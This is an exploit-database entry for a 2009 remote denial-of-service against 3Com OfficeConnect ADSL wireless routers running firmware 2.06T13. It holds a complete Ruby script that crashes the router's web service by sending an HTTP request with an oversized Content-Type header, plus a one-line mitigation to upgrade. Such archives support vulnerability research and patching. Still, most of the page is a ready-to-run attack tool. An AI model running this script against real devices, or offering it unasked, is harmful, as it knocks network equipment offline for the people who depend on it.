header-logo
Suggest Exploit
vendor:
OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
by:
Alberto Ortega
7.5
CVSS
HIGH
Remote Denial of Service Exploit
400
CWE
Product Name: OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
Affected Version From: 2.06T13
Affected Version To: 2.06T13
Patch Exists: YES
Related CWE: N/A
CPE: h:3com:officeconnect_adsl_wireless_11g_firewall_router_3crwdr100a-72
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: GNU/Linux (Sidux and Ubuntu) and Windows 7
2009

3Com OfficeConnect ADSL Wireless 11g Firewall Router Remote DoS Exploit by HTTP

This exploit is for 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72 running on Software Version 2.06T13 (Apr 2007, last version for these routers). The bug can be exploited with Tamper Data (Firefox Addon) too. The exploit is written in Ruby and can be used to send a malicious HTTP packet with a Content-Type value that causes the DoS. 8.times is enough to DoS.

Mitigation:

Upgrade to the latest version of the software.
Source

Exploit-DB raw data:

###############
# Model -> Tested on 3Com OfficeConnect ADSL Wireless 11g Firewall Router 3CRWDR100A-72 and 3CRWDR100Y-72
# Software Version -> Tested on 2.06T13 (Apr 2007, last version for these routers)
# Attacker -> Tested from GNU/Linux (Sidux and Ubuntu) and Windows 7
#
# Exploit languaje -> Ruby
# Type -> Remote Denial of Service Exploit by HTTP
#
# Additional info:
# - The bug can be exploited with Tamper Data (Firefox Addon) too, LOL.
#
###############
# Discovered and written by Alberto Ortega
# http://pentbox.net/
###############

require "socket"

host = ARGV[0]
buffer = "A"
send = ""

puts ""
if !host
	puts " 3Com OfficeConnect ADSL Wireless 11g Firewall Router"
	puts " Remote DoS Exploit by HTTP"
	puts " ------ Usage ---------------------------------------"
	puts " ruby 3com_dosexploit.rb host"
	puts " Ex: ruby 3com_dosexploit.rb 192.168.1.1"
else
	begin
		socket = TCPSocket.new(host, 80)
		puts "- Exploiting ..."
		# 8.times is enough to DoS
		9.times do
			buffer = "#{buffer}#{buffer}"
		end
		# Here are the HTTP packet, Content-Type value causes the DoS
		send = "GET / HTTP/1.1\r\nContent-Type:#{buffer}\r\n"
		socket.write(send)
		puts "- Successfully! :)"
	rescue
		puts "Connection problem"
	end
end
puts ""

Navigation

Suggest Exploit

Services By CQR